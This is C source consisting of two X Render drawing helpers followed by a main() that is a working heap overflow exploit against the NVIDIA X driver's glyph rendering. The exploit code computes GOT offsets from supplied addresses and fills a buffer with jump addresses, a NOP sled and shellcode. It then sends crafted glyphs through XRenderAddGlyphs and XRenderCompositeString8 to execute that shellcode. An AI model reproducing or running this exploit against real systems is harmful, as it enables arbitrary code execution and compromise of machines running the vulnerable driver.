void draw_point(int x, int y, int width, int size, XftColor *color) { XPointDouble p[4]; p[0].x = x - size; p[0].y = y - 1; p[1].x = x - size; p[1].y = y + 1; p[2].x = x + size; p[2].y = y + 1; p[3].x = x + size; p[3].y = y - 1; XRenderCompositeDoublePoly(display, PictOpOver, XftDrawSrcPicture(draw, color), XftDrawPicture(draw), XRenderFindStandardFormat(display, PictStandardA8), 0, 0, 0, 0, p, 4, 0); p[0].x = x - 1; p[0].y = y - size; p[1].x = x + 1; p[1].y = y - size; p[2].x = x + 1; p[2].y = y + size; p[3].x = x - 1; p[3].y = y + size; XRenderCompositeDoublePoly(display, PictOpOver, XftDrawSrcPicture(draw, color), XftDrawPicture(draw), XRenderFindStandardFormat(display, PictStandardA8), 0, 0, 0, 0, p, 4, 0); }
void DoFixedTrapezoids(XParms xp, Parms p, int reps) { int i; Picture white, black, src, dst; white = XftDrawSrcPicture (aadraw, &aawhite); black = XftDrawSrcPicture (aadraw, &aablack); dst = XftDrawPicture (aadraw); src = black; for (i = 0; i != reps; i++) { XRenderCompositeTrapezoids (xp->d, PictOpOver, src, dst, maskFormat, 0, 0, traps, p->objects); if (src == black) src = white; else src = black; CheckAbort (); } }
int main(int argc, char *argv[]) { Display *display; Widget toplevel; XtAppContext app_con; XEvent event; char c, *string; unsigned int i; XDataStr *data; XExposeEvent *expose = (XExposeEvent *)&event; unsigned int heapaddr, gotaddr; if (argc > 2) { heapaddr = strtoul(argv[1],NULL,0); gotaddr = strtoul(argv[2],NULL,0); } else { printf("Usage: %s <HEAPADDR> <GOTADDR>\n\n", argv[0]); return 0; } toplevel = XtAppInitialize(&app_con, "XSafe", NULL, 0, &argc, argv, NULL, NULL, 0); display = XtDisplay(toplevel); data = (XDataStr *)malloc(sizeof(XDataStr)); if (data == NULL) { perror("malloc"); exit(EXIT_FAILURE); } data->display = display; data->app = app_con; if (createWin(data) < 0) { fprintf(stderr, "can't create Data Window"); exit(EXIT_FAILURE); } show(data); signal(SIGINT, sigHandler); signal(SIGHUP, sigHandler); signal(SIGQUIT, sigHandler); signal(SIGTERM, sigHandler); /************************************************************************ * BEGIN FONT HEAP OVERFLOW SETUP CODE * * "It's so hard to write a graphics driver that open-sourcing it would * not help." * - Andrew Fear, Software Product Manager (NVIDIA Corporation). **********************************************************************/ XGlyphInfo * glyphs; XRenderPictFormat fmt; XRenderPictFormat *mask = 0; GlyphSet gset; char * buf =0; int offset, cr, numB; int xscreenpos = 32680; int magic_len = 32768 - xscreenpos; int wr_addr_len = 3548; int wr_nop_len = 200; /* Calculate the offset to the Global Offset Table. * 0x2C0000 is the size of the buffer the NVIDIA driver * allocates for us when it is about to draw. */ offset = gotaddr-(heapaddr-0x2C0000); offset += magic_len; glyphs = malloc(sizeof(XGlyphInfo)*3); /* Payload glyph */ glyphs[0].width = 0x4000; /* One contiguous buffer of 16K... way more than necessary */ glyphs[0].height = 1; glyphs[0].yOff = 0; glyphs[0].xOff = glyphs[0].width; glyphs[0].x = 0; glyphs[0].y = 0; /* Large offset glyph (untweaked) */ glyphs[1].width=0; glyphs[1].height=0; glyphs[1].yOff=32767; glyphs[1].xOff=0; glyphs[1].x = 0; glyphs[1].y = 0; /* Small offset glyph (tweaked) */ glyphs[2].width=0; glyphs[2].height=0; glyphs[2].yOff=0; glyphs[2].xOff=0; glyphs[2].x = 0; glyphs[2].y = 0; fmt.type = PictTypeDirect; fmt.depth = 8; Glyph * xglyphids = malloc(3*sizeof(Glyph)); xglyphids[0] = 'A'; xglyphids[1] = 'B'; xglyphids[2] = 'C'; int stride = ((glyphs[0].width*1)+3)&~3; /* Needs to be DWORD aligned */ int bufsize = stride*glyphs[0].height; buf = malloc(bufsize); /* Write jump address to the buffer a number of times */ for (cr=0; cr<wr_addr_len; cr+=4) { *((unsigned int*)((unsigned char*)buf + cr)) = gotaddr+wr_addr_len+4; } /* Write the NOP instructions until wr_nop_len */ memset(buf+wr_addr_len, 0x90 /* NOP */, wr_nop_len); /* Write the shellcode */ cr+=wr_nop_len; memcpy(buf+cr, shellcode, sizeof(shellcode)); /* Calculate the number of B's required to send */ numB = offset / (glyphs[1].yOff * magic_len); /* We send only one C, but we change its yOff value according to * how much space we have left before we meet the correct index length */ glyphs[2].yOff = (offset - (numB * glyphs[1].yOff * magic_len)) / (magic_len); /* Now create a new buffer for the string data */ string = malloc(numB+1/*numC*/+1/*numA*/+1/*NULL*/); for (cr=0; cr<numB; cr++) string[cr] = 'B'; string[cr] = 'C'; cr++; string[cr] = 'A'; cr++; string[cr] = 0; mask = XRenderFindFormat(display, PictFormatType|PictFormatDepth, &fmt, 0); gset = XRenderCreateGlyphSet(display, mask); if (mask) { /* Ask the server to tie the glyphs to the glyphset we created, * with our addr/nopslide/shellcode buffer as the alpha data. */ XRenderAddGlyphs(display, gset, xglyphids, glyphs, 3, buf, bufsize); } /* END FONT HEAP OVERFLOW SETUP CODE */ done = 0; while (!done) { XNextEvent(display, &event); switch(event.type) { case KeyPress: i = XLookupString(&event.xkey, &c, 1, NULL, NULL); if ((i == 1) && ((c == 'q') || (c == 'Q'))) { done = 1; } break; case Expose: XftDrawRect(data->draw, &data->bg, expose->x, expose->y, expose->width, expose->height); /* Send malignant glyphs and execute shellcode on target */ XRenderCompositeString8(display, PictOpOver, XftDrawSrcPicture(data->draw, &data->color), XftDrawPicture(data->draw), mask, gset, 0, 0, xscreenpos, 0, string, strlen(string)); break; } } free(glyphs); free(xglyphids); free(buf); free(string); XFlush(display); XUnmapWindow(data->display, data->win); XUngrabKeyboard(data->display, CurrentTime); XCloseDisplay(display); exit(EXIT_SUCCESS); }